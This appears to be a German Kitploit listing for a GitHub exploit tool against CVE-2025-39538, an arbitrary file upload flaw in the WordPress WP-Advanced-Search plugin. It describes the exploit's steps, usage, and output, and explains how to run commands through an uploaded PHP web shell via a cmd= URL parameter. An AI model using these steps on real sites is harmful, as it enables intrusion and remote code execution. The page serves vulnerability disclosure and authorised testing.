Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-39538 — WordPress WP-Advanced-Search <= 3.3.9.3 - Schwachstelle beim Hochladen beliebiger Dateien | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-39538
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-39538

CVE-2025-39538

WordPress WP-Advanced-Search <= 3.3.9.3 - Schwachstelle beim Hochladen beliebiger Dateien

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 Beliebiger Datei-Upload

CVE-2025-39538
Veröffentlicht: 2025-04-16
Schwachstellentyp: Beliebiger Datei-Upload (Uneingeschränkter Upload von Dateien mit gefährlichem Typ)
Betroffenes Plugin: WP-Advanced-Search von Mathieu Chartier
Betroffene Versionen: Alle Versionen bis einschließlich 3.3.9.3

Diese Schwachstelle ermöglicht es einem authentifizierten Angreifer, mithilfe der vom Plugin bereitgestellten Importfunktion eine schädliche PHP-Datei (z. B. eine Web-Shell) auf den Server hochzuladen. Die hochgeladene Datei wird im WordPress-Uploads-Verzeichnis abgelegt und kann zu Remote-Code-Ausführung führen.

🧱 Upload-Pfad:

root@kitploit:~
wp-content/uploads/2025/04/

⚙️ Über das Exploit-Skript

Dieses Python-Skript führt folgende Aktionen aus:

  1. Meldet sich mit den angegebenen Anmeldedaten bei der WordPress-Site an.
  2. Extrahiert das erforderliche wp_advanced_search_up_nonce aus der Import/Export-Administrationsseite.
  3. Lädt eine Web-Shell (PHP-Datei) über eine manipulierte POST-Anfrage hoch.

🚀 Verwendung

root@kitploit:~
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

🖥️ Beispielausgabe:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).

🐚 Verwenden der hochgeladenen Shell

Nach dem Upload kannst du wie folgt auf deine Shell zugreifen:

root@kitploit:~
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami

Ersetze whoami durch einen beliebigen Linux-Befehl, den du ausführen möchtest, zum Beispiel:

  • id — zeigt die aktuelle Benutzer-ID an.
  • pwd — zeigt das aktuelle Verzeichnis an.
  • ls — listet Dateien auf.

⚠️ Haftungsausschluss


Dieses Tool ist ausschließlich für Lehrzwecke und autorisierte Sicherheitstests gedacht.
Der Autor ist für jeglichen Missbrauch oder Schäden, die durch dieses Skript verursacht werden, nicht verantwortlich.


Von: Nxploited | Khaled Alenazi

Tool herunterladen